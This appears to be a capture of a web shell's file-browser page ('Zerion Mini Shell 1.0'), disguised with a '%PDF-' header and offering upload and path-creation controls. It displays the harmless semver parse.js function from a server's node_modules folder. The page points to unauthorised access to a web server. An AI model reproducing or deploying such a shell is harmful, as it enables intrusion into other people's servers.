%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/node_modules/semver/functions/
Upload File :
Create Path :
Current File : /var/www/html/node_modules/semver/functions/parse.js

const SemVer = require('../classes/semver')
const parse = (version, options, throwErrors = false) => {
  if (version instanceof SemVer) {
    return version
  }
  try {
    return new SemVer(version, options)
  } catch (er) {
    if (!throwErrors) {
      return null
    }
    throw er
  }
}

module.exports = parse

Zerion Mini Shell 1.0